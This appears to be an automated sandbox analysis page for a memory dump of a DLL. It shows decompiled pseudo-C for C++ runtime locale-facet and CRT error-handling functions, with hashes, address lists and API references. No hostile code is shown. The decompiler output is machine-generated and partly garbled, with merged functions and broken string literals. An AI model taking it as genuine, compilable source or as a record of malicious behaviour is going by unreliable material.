Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: pm(n
API String ID: 651022567-4246979846
Opcode ID: 435cb87e69ab4875017fb59220c966b1ec2d0b33d00b00658b6448439bfc64fd
Instruction ID: a133a39583de3a20a79a042813344a1cb77d975f4a44bc8088a2d49963d4b37b
Opcode Fuzzy Hash: 435cb87e69ab4875017fb59220c966b1ec2d0b33d00b00658b6448439bfc64fd
Instruction Fuzzy Hash: E6115C7591051DDBCF01DBE4C854AFEB37ABF64B14F240809D420E7290DF789985E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DBBD6, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E6E1DBBD6(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t55;
				intOrPtr* _t63;
				intOrPtr* _t64;
				void* _t66;

				_t48 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t66 - 0x14, 0);
				_t63 =  *0x6e286e44; // 0x0
				 *(_t66 - 4) =  *(_t66 - 4) & 0x00000000;
				 *((intOrPtr*)(_t66 - 0x10)) = _t63;
				_t27 = E6E1A161C(0x6e286e24);
				_t51 =  *((intOrPtr*)(_t66 + 8));
				_t28 = E6E1A171B( *((intOrPtr*)(_t66 + 8)), _t27);
				_t61 = _t28;
				if(_t28 != 0) {
					L5:
					E6E1C66BA(_t66 - 0x14);
					return E6E1E0075(_t61);
				} else {
					if(_t63 == 0) {
						_push( *((intOrPtr*)(_t66 + 8)));
						_push(_t66 - 0x10);
						__eflags = E6E1DC295(__ebx, _t51, __edx, _t61, _t63) - 0xffffffff;
						if(__eflags == 0) {
							_t55 = _t66 - 0x20;
							E6E1A1438(_t55);
							E6E1E3D74(_t66 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e22851f, __ebx, _t61, _t63, 4);
							_t64 = _t55;
							 *((intOrPtr*)(_t66 - 0x10)) = _t64;
							 *((intOrPtr*)(_t64 + 4)) =  *((intOrPtr*)(_t66 + 0xc));
							_push( *((intOrPtr*)(_t66 + 0x14)));
							_t21 = _t66 - 4;
							 *_t21 =  *(_t66 - 4) & 0x00000000;
							__eflags =  *_t21;
							 *_t64 = 0x6e22c414;
							 *((char*)(_t64 + 0x28)) =  *((intOrPtr*)(_t66 + 0x10));
							E6E1DD028(_t48, _t55, __edx, _t61, _t64,  *_t21);
							return E6E1E0075(_t64,  *((intOrPtr*)(_t66 + 8)));
						} else {
							_t61 =  *((intOrPtr*)(_t66 - 0x10));
							 *((intOrPtr*)(_t66 - 0x10)) = _t61;
							 *(_t66 - 4) = 1;
							E6E1C6FD3(__eflags, _t61);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t61 + 4))))();
							 *0x6e286e44 = _t61;
							goto L5;
						}
					} else {
						_t61 = _t63;
						goto L5;
					}
				}
			}

0x6e1dbbd6
0x6e1dbbdd
0x6e1dbbe7
0x6e1dbbec
0x6e1dbbf7
0x6e1dbbfb
0x6e1dbbfe
0x6e1dbc03
0x6e1dbc07
0x6e1dbc0c
0x6e1dbc10
0x6e1dbc55
0x6e1dbc58
0x6e1dbc64
0x6e1dbc12
0x6e1dbc14
0x6e1dbc1a
0x6e1dbc20
0x6e1dbc28
0x6e1dbc2b
0x6e1dbc65
0x6e1dbc68
0x6e1dbc76
0x6e1dbc7b
0x6e1dbc83
0x6e1dbc88
0x6e1dbc8a
0x6e1dbc90
0x6e1dbc93
0x6e1dbc9c
0x6e1dbc9c
0x6e1dbc9c
0x6e1dbca0
0x6e1dbca6
0x6e1dbca9
0x6e1dbcb5
0x6e1dbc2d
0x6e1dbc2d
0x6e1dbc30
0x6e1dbc34
0x6e1dbc38
0x6e1dbc45
0x6e1dbc4d
0x6e1dbc4f
0x00000000
0x6e1dbc4f
0x6e1dbc16
0x6e1dbc16
0x00000000
0x6e1dbc16
0x6e1dbc14

APIs

__EH_prolog3.LIBCMT ref: 6E1DBBDD
std::_Lockit::_Lockit.LIBCPMT ref: 6E1DBBE7
int.LIBCPMT ref: 6E1DBBFE

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1DBC38
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1DBC58
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1DBC76

Strings

$n(n, xrefs: 6E1DBBF2

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: $n(n
API String ID: 651022567-3138053034
Opcode ID: 129235130b64a5642afe1ca213275f7064492e4ca5c886d626d590e41bcc57e6
Instruction ID: 8c3549ca1929aff912c114db40eafea3d56b75bd14fbf5132257b1863471513e
Opcode Fuzzy Hash: 129235130b64a5642afe1ca213275f7064492e4ca5c886d626d590e41bcc57e6
Instruction Fuzzy Hash: 08113675910518CBCF01DBE4C854EFEB77ABF94704F140908E121AB290DF749D89E791

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF8A5, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6E1CF8A5(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t111;
				signed int _t112;
				void* _t124;
				void* _t137;
				void* _t150;
				void* _t163;
				void* _t176;
				void* _t189;
				signed int _t283;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				void* _t330;

				_t305 = __edx;
				_t234 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t330 - 0x14, 0);
				_t315 =  *0x6e286db0; // 0x0
				 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
				 *(_t330 - 0x10) = _t315;
				_t111 = E6E1A161C(0x6e286d64);
				_t237 =  *((intOrPtr*)(_t330 + 8));
				_t112 = E6E1A171B( *((intOrPtr*)(_t330 + 8)), _t111);
				_t307 = _t112;
				if(_t112 != 0) {
					L5:
					E6E1C66BA(_t330 - 0x14);
					return E6E1E0075(_t307);
				} else {
					if(_t315 == 0) {
						_push( *((intOrPtr*)(_t330 + 8)));
						_push(_t330 - 0x10);
						__eflags = E6E1D13A1(__ebx, _t237, __edx, _t307, _t315) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t330 - 0x20);
							E6E1E3D74(_t330 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t307, _t315, 0x14);
							E6E1C6653(_t330 - 0x14, 0);
							_t316 =  *0x6e286ddc; // 0x0
							 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
							 *(_t330 - 0x10) = _t316;
							_t124 = E6E1A161C(0x6e286d88);
							_t244 =  *((intOrPtr*)(_t330 + 8));
							_t308 = E6E1A171B( *((intOrPtr*)(_t330 + 8)), _t124);
							__eflags = _t308;
							if(_t308 != 0) {
								L12:
								E6E1C66BA(_t330 - 0x14);
								return E6E1E0075(_t308);
							} else {
								__eflags = _t316;
								if(_t316 == 0) {
									_push( *((intOrPtr*)(_t330 + 8)));
									_push(_t330 - 0x10);
									__eflags = E6E1D1409(_t234, _t244, __edx, _t308, _t316) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t330 - 0x20);
										E6E1E3D74(_t330 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t234, _t308, _t316, 0x14);
										E6E1C6653(_t330 - 0x14, 0);
										_t317 =  *0x6e286de0; // 0x0
										 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
										 *(_t330 - 0x10) = _t317;
										_t137 = E6E1A161C(0x6e286d8c);
										_t251 =  *((intOrPtr*)(_t330 + 8));
										_t309 = E6E1A171B( *((intOrPtr*)(_t330 + 8)), _t137);
										__eflags = _t309;
										if(_t309 != 0) {
											L19:
											E6E1C66BA(_t330 - 0x14);
											return E6E1E0075(_t309);
										} else {
											__eflags = _t317;
											if(_t317 == 0) {
												_push( *((intOrPtr*)(_t330 + 8)));
												_push(_t330 - 0x10);
												__eflags = E6E1D1471(_t234, _t251, __edx, _t309, _t317) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t330 - 0x20);
													E6E1E3D74(_t330 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t234, _t309, _t317, 0x14);
													E6E1C6653(_t330 - 0x14, 0);
													_t318 =  *0x6e286dfc; // 0x0
													 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
													 *(_t330 - 0x10) = _t318;
													_t150 = E6E1A161C(0x6e286da8);
													_t258 =  *((intOrPtr*)(_t330 + 8));
													_t310 = E6E1A171B( *((intOrPtr*)(_t330 + 8)), _t150);
													__eflags = _t310;
													if(_t310 != 0) {
														L26:
														E6E1C66BA(_t330 - 0x14);
														return E6E1E0075(_t310);
													} else {
														__eflags = _t318;
														if(_t318 == 0) {
															_push( *((intOrPtr*)(_t330 + 8)));
															_push(_t330 - 0x10);
															__eflags = E6E1D14EC(_t234, _t258, _t305, _t310, _t318) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t330 - 0x20);
																E6E1E3D74(_t330 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t234, _t310, _t318, 0x14);
																E6E1C6653(_t330 - 0x14, 0);
																_t319 =  *0x6e286dcc; // 0x0
																 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																 *(_t330 - 0x10) = _t319;
																_t163 = E6E1A161C(0x6e286d80);
																_t265 =  *((intOrPtr*)(_t330 + 8));
																_t311 = E6E1A171B( *((intOrPtr*)(_t330 + 8)), _t163);
																__eflags = _t311;
																if(_t311 != 0) {
																	L33:
																	E6E1C66BA(_t330 - 0x14);
																	return E6E1E0075(_t311);
																} else {
																	__eflags = _t319;
																	if(_t319 == 0) {
																		_push( *((intOrPtr*)(_t330 + 8)));
																		_push(_t330 - 0x10);
																		__eflags = E6E1D1558(_t234, _t265, _t305, _t311, _t319) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1A1438(_t330 - 0x20);
																			E6E1E3D74(_t330 - 0x20, 0x6e283504);
																			asm("int3");
																			E6E1E00AC(0x6e2283cf, _t234, _t311, _t319, 0x14);
																			E6E1C6653(_t330 - 0x14, 0);
																			_t320 =  *0x6e286e00; // 0x0
																			 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																			 *(_t330 - 0x10) = _t320;
																			_t176 = E6E1A161C(0x6e286dac);
																			_t272 =  *((intOrPtr*)(_t330 + 8));
																			_t312 = E6E1A171B( *((intOrPtr*)(_t330 + 8)), _t176);
																			__eflags = _t312;
																			if(_t312 != 0) {
																				L40:
																				E6E1C66BA(_t330 - 0x14);
																				return E6E1E0075(_t312);
																			} else {
																				__eflags = _t320;
																				if(_t320 == 0) {
																					_push( *((intOrPtr*)(_t330 + 8)));
																					_push(_t330 - 0x10);
																					__eflags = E6E1D15C4(_t234, _t272, _t305, _t312, _t320) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1A1438(_t330 - 0x20);
																						E6E1E3D74(_t330 - 0x20, 0x6e283504);
																						asm("int3");
																						E6E1E00AC(0x6e2283cf, _t234, _t312, _t320, 0x14);
																						E6E1C6653(_t330 - 0x14, 0);
																						_t321 =  *0x6e286dd0; // 0x0
																						 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																						 *(_t330 - 0x10) = _t321;
																						_t189 = E6E1A161C(0x6e286d60);
																						_t279 =  *((intOrPtr*)(_t330 + 8));
																						_t313 = E6E1A171B( *((intOrPtr*)(_t330 + 8)), _t189);
																						__eflags = _t313;
																						if(_t313 != 0) {
																							L47:
																							E6E1C66BA(_t330 - 0x14);
																							return E6E1E0075(_t313);
																						} else {
																							__eflags = _t321;
																							if(_t321 == 0) {
																								_push( *((intOrPtr*)(_t330 + 8)));
																								_push(_t330 - 0x10);
																								__eflags = E6E1D162A(_t234, _t279, _t305, _t313, _t321) - 0xffffffff;
																								if(__eflags == 0) {
																									_t283 = _t330 - 0x20;
																									E6E1A1438(_t283);
																									E6E1E3D74(_t330 - 0x20, 0x6e283504);
																									asm("int3");
																									E6E1E00AC(0x6e22851f, _t234, _t313, _t321, 4);
																									_t322 = _t283;
																									 *(_t330 - 0x10) = _t322;
																									 *((intOrPtr*)(_t322 + 4)) =  *((intOrPtr*)(_t330 + 0xc));
																									_push( *((intOrPtr*)(_t330 + 0x14)));
																									_t105 = _t330 - 4;
																									 *_t105 =  *(_t330 - 4) & 0x00000000;
																									__eflags =  *_t105;
																									 *_t322 = 0x6e22c0c4;
																									 *((char*)(_t322 + 0x28)) =  *((intOrPtr*)(_t330 + 0x10));
																									E6E1D542F(_t234, _t283, _t305, _t313, _t322,  *_t105);
																									return E6E1E0075(_t322,  *((intOrPtr*)(_t330 + 8)));
																								} else {
																									_t313 =  *(_t330 - 0x10);
																									 *(_t330 - 0x10) = _t313;
																									 *(_t330 - 4) = 1;
																									E6E1C6FD3(__eflags, _t313);
																									 *0x6e22a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t313 + 4))))();
																									 *0x6e286dd0 = _t313;
																									goto L47;
																								}
																							} else {
																								_t313 = _t321;
																								goto L47;
																							}
																						}
																					} else {
																						_t312 =  *(_t330 - 0x10);
																						 *(_t330 - 0x10) = _t312;
																						 *(_t330 - 4) = 1;
																						E6E1C6FD3(__eflags, _t312);
																						 *0x6e22a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t312 + 4))))();
																						 *0x6e286e00 = _t312;
																						goto L40;
																					}
																				} else {
																					_t312 = _t320;
																					goto L40;
																				}
																			}
																		} else {
																			_t311 =  *(_t330 - 0x10);
																			 *(_t330 - 0x10) = _t311;
																			 *(_t330 - 4) = 1;
																			E6E1C6FD3(__eflags, _t311);
																			 *0x6e22a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t311 + 4))))();
																			 *0x6e286dcc = _t311;
																			goto L33;
																		}
																	} else {
																		_t311 = _t319;
																		goto L33;
																	}
																}
															} else {
																_t310 =  *(_t330 - 0x10);
																 *(_t330 - 0x10) = _t310;
																 *(_t330 - 4) = 1;
																E6E1C6FD3(__eflags, _t310);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t310 + 4))))();
																 *0x6e286dfc = _t310;
																goto L26;
															}
														} else {
															_t310 = _t318;
															goto L26;
														}
													}
												} else {
													_t309 =  *(_t330 - 0x10);
													 *(_t330 - 0x10) = _t309;
													 *(_t330 - 4) = 1;
													E6E1C6FD3(__eflags, _t309);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t309 + 4))))();
													 *0x6e286de0 = _t309;
													goto L19;
												}
											} else {
												_t309 = _t317;
												goto L19;
											}
										}
									} else {
										_t308 =  *(_t330 - 0x10);
										 *(_t330 - 0x10) = _t308;
										 *(_t330 - 4) = 1;
										E6E1C6FD3(__eflags, _t308);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t308 + 4))))();
										 *0x6e286ddc = _t308;
										goto L12;
									}
								} else {
									_t308 = _t316;
									goto L12;
								}
							}
						} else {
							_t307 =  *(_t330 - 0x10);
							 *(_t330 - 0x10) = _t307;
							 *(_t330 - 4) = 1;
							E6E1C6FD3(__eflags, _t307);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t307 + 4))))();
							 *0x6e286db0 = _t307;
							goto L5;
						}
					} else {
						_t307 = _t315;
						goto L5;
					}
				}
			}

0x6e1cf8a5
0x6e1cf8a5
0x6e1cf8ac
0x6e1cf8b6
0x6e1cf8bb
0x6e1cf8c6
0x6e1cf8ca
0x6e1cf8cd
0x6e1cf8d2
0x6e1cf8d6
0x6e1cf8db
0x6e1cf8df
0x6e1cf924
0x6e1cf927
0x6e1cf933
0x6e1cf8e1
0x6e1cf8e3
0x6e1cf8e9
0x6e1cf8ef
0x6e1cf8f7
0x6e1cf8fa
0x6e1cf937
0x6e1cf945
0x6e1cf94a
0x6e1cf952
0x6e1cf95c
0x6e1cf961
0x6e1cf96c
0x6e1cf970
0x6e1cf973
0x6e1cf978
0x6e1cf981
0x6e1cf983
0x6e1cf985
0x6e1cf9ca
0x6e1cf9cd
0x6e1cf9d9
0x6e1cf987
0x6e1cf987
0x6e1cf989
0x6e1cf98f
0x6e1cf995
0x6e1cf99d
0x6e1cf9a0
0x6e1cf9dd
0x6e1cf9eb
0x6e1cf9f0
0x6e1cf9f8
0x6e1cfa02
0x6e1cfa07
0x6e1cfa12
0x6e1cfa16
0x6e1cfa19
0x6e1cfa1e
0x6e1cfa27
0x6e1cfa29
0x6e1cfa2b
0x6e1cfa70
0x6e1cfa73
0x6e1cfa7f
0x6e1cfa2d
0x6e1cfa2d
0x6e1cfa2f
0x6e1cfa35
0x6e1cfa3b
0x6e1cfa43
0x6e1cfa46
0x6e1cfa83
0x6e1cfa91
0x6e1cfa96
0x6e1cfa9e
0x6e1cfaa8
0x6e1cfaad
0x6e1cfab8
0x6e1cfabc
0x6e1cfabf
0x6e1cfac4
0x6e1cfacd
0x6e1cfacf
0x6e1cfad1
0x6e1cfb16
0x6e1cfb19
0x6e1cfb25
0x6e1cfad3
0x6e1cfad3
0x6e1cfad5
0x6e1cfadb
0x6e1cfae1
0x6e1cfae9
0x6e1cfaec
0x6e1cfb29
0x6e1cfb37
0x6e1cfb3c
0x6e1cfb44
0x6e1cfb4e
0x6e1cfb53
0x6e1cfb5e
0x6e1cfb62
0x6e1cfb65
0x6e1cfb6a
0x6e1cfb73
0x6e1cfb75
0x6e1cfb77
0x6e1cfbbc
0x6e1cfbbf
0x6e1cfbcb
0x6e1cfb79
0x6e1cfb79
0x6e1cfb7b
0x6e1cfb81
0x6e1cfb87
0x6e1cfb8f
0x6e1cfb92
0x6e1cfbcf
0x6e1cfbdd
0x6e1cfbe2
0x6e1cfbea
0x6e1cfbf4
0x6e1cfbf9
0x6e1cfc04
0x6e1cfc08
0x6e1cfc0b
0x6e1cfc10
0x6e1cfc19
0x6e1cfc1b
0x6e1cfc1d
0x6e1cfc62
0x6e1cfc65
0x6e1cfc71
0x6e1cfc1f
0x6e1cfc1f
0x6e1cfc21
0x6e1cfc27
0x6e1cfc2d
0x6e1cfc35
0x6e1cfc38
0x6e1cfc75
0x6e1cfc83
0x6e1cfc88
0x6e1cfc90
0x6e1cfc9a
0x6e1cfc9f
0x6e1cfcaa
0x6e1cfcae
0x6e1cfcb1
0x6e1cfcb6
0x6e1cfcbf
0x6e1cfcc1
0x6e1cfcc3
0x6e1cfd08
0x6e1cfd0b
0x6e1cfd17
0x6e1cfcc5
0x6e1cfcc5
0x6e1cfcc7
0x6e1cfccd
0x6e1cfcd3
0x6e1cfcdb
0x6e1cfcde
0x6e1cfd18
0x6e1cfd1b
0x6e1cfd29
0x6e1cfd2e
0x6e1cfd36
0x6e1cfd3b
0x6e1cfd3d
0x6e1cfd43
0x6e1cfd46
0x6e1cfd4f
0x6e1cfd4f
0x6e1cfd4f
0x6e1cfd53
0x6e1cfd59
0x6e1cfd5c
0x6e1cfd68
0x6e1cfce0
0x6e1cfce0
0x6e1cfce3
0x6e1cfce7
0x6e1cfceb
0x6e1cfcf8
0x6e1cfd00
0x6e1cfd02
0x00000000
0x6e1cfd02
0x6e1cfcc9
0x6e1cfcc9
0x00000000
0x6e1cfcc9
0x6e1cfcc7
0x6e1cfc3a
0x6e1cfc3a
0x6e1cfc3d
0x6e1cfc41
0x6e1cfc45
0x6e1cfc52
0x6e1cfc5a
0x6e1cfc5c
0x00000000
0x6e1cfc5c
0x6e1cfc23
0x6e1cfc23
0x00000000
0x6e1cfc23
0x6e1cfc21
0x6e1cfb94
0x6e1cfb94
0x6e1cfb97
0x6e1cfb9b
0x6e1cfb9f
0x6e1cfbac
0x6e1cfbb4
0x6e1cfbb6
0x00000000
0x6e1cfbb6
0x6e1cfb7d
0x6e1cfb7d
0x00000000
0x6e1cfb7d
0x6e1cfb7b
0x6e1cfaee
0x6e1cfaee
0x6e1cfaf1
0x6e1cfaf5
0x6e1cfaf9
0x6e1cfb06
0x6e1cfb0e
0x6e1cfb10
0x00000000
0x6e1cfb10
0x6e1cfad7
0x6e1cfad7
0x00000000
0x6e1cfad7
0x6e1cfad5
0x6e1cfa48
0x6e1cfa48
0x6e1cfa4b
0x6e1cfa4f
0x6e1cfa53
0x6e1cfa60
0x6e1cfa68
0x6e1cfa6a
0x00000000
0x6e1cfa6a
0x6e1cfa31
0x6e1cfa31
0x00000000
0x6e1cfa31
0x6e1cfa2f
0x6e1cf9a2
0x6e1cf9a2
0x6e1cf9a5
0x6e1cf9a9
0x6e1cf9ad
0x6e1cf9ba
0x6e1cf9c2
0x6e1cf9c4
0x00000000
0x6e1cf9c4
0x6e1cf98b
0x6e1cf98b
0x00000000
0x6e1cf98b
0x6e1cf989
0x6e1cf8fc
0x6e1cf8fc
0x6e1cf8ff
0x6e1cf903
0x6e1cf907
0x6e1cf914
0x6e1cf91c
0x6e1cf91e
0x00000000
0x6e1cf91e
0x6e1cf8e5
0x6e1cf8e5
0x00000000
0x6e1cf8e5
0x6e1cf8e3

APIs

__EH_prolog3.LIBCMT ref: 6E1CF8AC
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CF8B6
int.LIBCPMT ref: 6E1CF8CD

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1CF907
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CF927
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CF945

Strings

dm(n, xrefs: 6E1CF8C1

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: dm(n
API String ID: 651022567-576193998
Opcode ID: 661331adba2d5a379ec6af93e185d29bf912396a4a8b2f9ed8862b8fe3f434c8
Instruction ID: 2d31d974f9024413aea7b2dc93d21ea6cd48075df04141dc2f3f58cfbfe5e24a
Opcode Fuzzy Hash: 661331adba2d5a379ec6af93e185d29bf912396a4a8b2f9ed8862b8fe3f434c8
Instruction Fuzzy Hash: F5113AB59105199BCF01DBE4C854AFEB3BAAF64B14F240408E120E7290CF789985E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E20D5FF, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E6E20D5FF(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x6e2851e4; // 0x8
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E6E20C7EF(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E6E214196(_t25, __eflags,  *0x6e2851e4, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E6E20D33F(_t25, _t31, "0d�");
							E6E20CBD3(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E6E20CBD3();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E6E2062FA(_t20, _t25, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x6e2851e4; // 0x8
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E6E20C7EF(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E6E214196(_t27, __eflags,  *0x6e2851e4, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E6E20D33F(_t27, _t32, "0d�");
									E6E20CBD3(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E6E20CBD3();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E6E214140(_t25, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E6E214140(_t23, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}

0x6e20d5ff
0x6e20d5ff
0x6e20d5ff
0x6e20d609
0x6e20d60b
0x6e20d610
0x6e20d613
0x6e20d621
0x6e20d628
0x6e20d62d
0x6e20d630
0x6e20d633
0x6e20d645
0x6e20d64a
0x6e20d64c
0x6e20d657
0x6e20d65e
0x6e20d663
0x6e20d666
0x6e20d668
0x00000000
0x00000000
0x00000000
0x00000000
0x6e20d64e
0x6e20d64e
0x00000000
0x6e20d64e
0x6e20d635
0x6e20d635
0x6e20d636
0x6e20d636
0x6e20d63b
0x6e20d676
0x6e20d677
0x6e20d67d
0x6e20d682
0x6e20d685
0x6e20d686
0x6e20d687
0x6e20d68e
0x6e20d690
0x6e20d692
0x6e20d697
0x6e20d69a
0x6e20d6a8
0x6e20d6b4
0x6e20d6b7
0x6e20d6ba
0x6e20d6cc
0x6e20d6d1
0x6e20d6d3
0x6e20d6de
0x6e20d6e4
0x6e20d6ec
0x6e20d6ee
0x00000000
0x00000000
0x00000000
0x00000000
0x6e20d6d5
0x6e20d6d5
0x00000000
0x6e20d6d5
0x6e20d6bc
0x6e20d6bc
0x6e20d6bd
0x6e20d6bd
0x6e20d6f0
0x6e20d6f1
0x6e20d6f1
0x6e20d69c
0x6e20d6a2
0x6e20d6a6
0x6e20d6f9
0x6e20d6fa
0x6e20d700
0x00000000
0x00000000
0x00000000
0x6e20d6a6
0x6e20d707
0x6e20d707
0x6e20d615
0x6e20d61b
0x6e20d61f
0x6e20d66a
0x6e20d66b
0x6e20d675
0x00000000
0x00000000
0x00000000
0x6e20d61f

APIs

GetLastError.KERNEL32(?,6E29CE94,6E201803,6E282B60,0000000C,6E1C402A,00000000,00000001,?,`k(n,00000020,6E1C159B,07B3393E), ref: 6E20D603
_free.LIBCMT ref: 6E20D636
_free.LIBCMT ref: 6E20D65E
SetLastError.KERNEL32(00000000,6E282B60,0000000C,6E1C402A,00000000,00000001,?,`k(n,00000020,6E1C159B,07B3393E), ref: 6E20D66B
SetLastError.KERNEL32(00000000,6E282B60,0000000C,6E1C402A,00000000,00000001,?,`k(n,00000020,6E1C159B,07B3393E), ref: 6E20D677
_abort.LIBCMT ref: 6E20D67D

Strings

0d, xrefs: 6E20D651

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$_free$_abort
String ID: 0d
API String ID: 3160817290-2809447700
Opcode ID: 2bb5e24f0174f6d2d02a406a75459807db36a0c8eb041ae42f10313f97b2e78b
Instruction ID: 19f27a94440cbec6089753ab493450d8930eefda881e20ecf7b1a33f68bcafe4
